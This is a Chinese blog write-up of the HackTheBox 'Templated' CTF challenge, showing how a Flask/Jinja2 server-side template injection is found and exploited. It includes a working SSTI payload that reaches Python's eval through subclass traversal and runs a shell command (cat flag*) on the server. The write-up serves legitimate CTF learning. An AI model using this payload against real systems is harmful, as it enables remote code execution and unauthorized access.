HTB-Templated

最新推荐文章于 2024-09-14 10:24:09 发布
最新推荐文章于 2024-09-14 10:24:09 发布
阅读量427 收藏 2
点赞数
分类专栏: # Web 文章标签: web安全 安全 flask 安全漏洞 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/galaxy3000/article/details/122678770
版权

文章目录

概述

HackTheBox 网站CTF靶场Web相关题目Templated,题目地址https://app.hackthebox.com/challenges/templated,考察Flask SSTI(服务器模板注入)漏洞的利用。

在这里插入图片描述

题目

题目概述

开启程序实例后,提示访问167.99.202.131:31954,访问http://167.99.202.131:31954,看到如下Web界面
在这里插入图片描述

提示很明确,使用了Flask和Jinja2,结合题目名称Templated,大概率为Flask SSTI漏洞,测试过程如下

首先访问http://167.99.202.131:31954/flag
在这里插入图片描述

接着访问http://167.99.202.131:31954/{{3*3}}
在这里插入图片描述

题目解答

SSTI利用代码如下

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='_IterationGuard' %}
{{ c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat flag*').read()") }}
{% endif %}
{% endfor %}

使用火狐浏览器的HackBar Quantum插件,拼接url,得到flag
在这里插入图片描述

galaxy3000
关注
专栏目录
Hack the Box——Templated (ssti) wp
maple's的博客
01-22 2883
0x00前言 刚做完第一题的我,立马打开了第二题 提示:Can you exploit this simple mistake?(您可以利用这个简单的错误吗?) 0x01访问网站 http://178.128.40.217:31440/ 从界面提示Proudly powered by Flask/Jinja2,首先盲猜是ssti漏洞 根据以往的经验首先找注入点 0x02 注入点 url尝试payload ?={{3*3}} 从这里明确是ssti漏洞,也找的注入点..
htb-beep
m0_55772907的博客
09-15 956
一般
templated-hielo-admin
08-21
bootstrap 后台模板
art-templated的使用
一枚不断学习的小码农一枚~
07-11 341
art-template是什么 art-template 是一个简约、超快的模板引擎。它采用作用域预声明的技术来优化模板渲染速度,从而获得接近 JavaScript 极限的运行性能,并且同时支持 NodeJS 和浏览器。 art-template 数据渲染方式 1.引入art-template.js文件 <script src="template-debug.js"&gt...
设计模式-模板模式(Template)介绍和使用
旭东怪的博客
04-15 1888
目录 1模板模式(Template) 2 抽象Template类 3 具体Template类 3.1 TemplateA类 3.2 TemplateB类 3.3 TemplateC类 3.4 TemplateD类 4 调试代码 5 调试结果 注: 1模板模式(Template) 意图:定义一个操作中的算法的骨架,而将一些步骤延迟到子类中。模板方法使得子类可以不改变一个算法的结构即可重定义该算法的某些特定步骤。 主要解决:一些方法通用,却在每一个子类都重新写了这...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
HTB-Gen:脚本para gerar邀请de HackTheBox
03-29
HTB-Gen 脚本para gerar邀请de HackTheBox Windows / Linux Qualquer pessoa pode usar o script para fins lucrativos,para usar apenas tens abrir o teu Terminal / CMD dentro do diretorio do script depois...
htb_challenges:为我所有过于复杂的htb挑战完成内容转储
03-27
htb_challenges 为我所有过于复杂的htb挑战完成内容转储
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
Hack The Box——AI
江左盟的博客
02-28 936
目录 简介 信息收集 漏洞发现 漏洞利用 权限提升 总结 简介 这是一个比较有创意、考验脑洞的靶机(可能是我见识少),难度主要集中在漏洞发现部分。我按一般逻辑进行渗透,在发现文件上传点和两个文件(db.php和intelligence.php)之后,尝试绕过上传无果,只好借助强大的Google进行寻找思路了,原来是通过上传的wav音频文件进行SQL注入,然后获取用户名和密码通过SS...
Hack the Box——Wafwaf(代码审计) wp
maple's的博客
01-23 528
0x00前言 又开始了一天的学习之路打开了我的Hack the Box Wafwaf 提示:My classmate Jason made this small and super secure note taking application, check it out!(我的同学Jason制作了这个小型且超级安全的笔记记录应用程序,请查看!) 0x01访问网站 访问界面,简单明了,直接给了源码 http://167.99.88.216:30957/ 显然就是代码审计了 简单看下代码
新版HackTheBox做题记录(WP)
midi
04-19 3237
HTB(Hack the box)做题笔记WP Challenges:Web{Emdee five for life、Templated、Phonebook、FreeLancer、Gunship、Weather App} ,MISC{misDIRection、Blackhole、Eternal Loop、Longbottom's Locker、Canvas}
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
09-14 3281
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全实训八(y0usef靶机渗透实例)
Wrop的博客
09-12 530
y0usef靶机渗透实例
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 849
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
ROS双线HTB流控配置手册:保障游戏体验
"ROS双线HTB操作手册" ROS双线HTB(Hierarchical Token Bucket,层次化令牌桶)是一种高级的流量整形技术,用于在RouterOS操作系统中实现精细化的网络带宽管理。此手册主要针对如何在双线环境中,如电信和联通线路...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值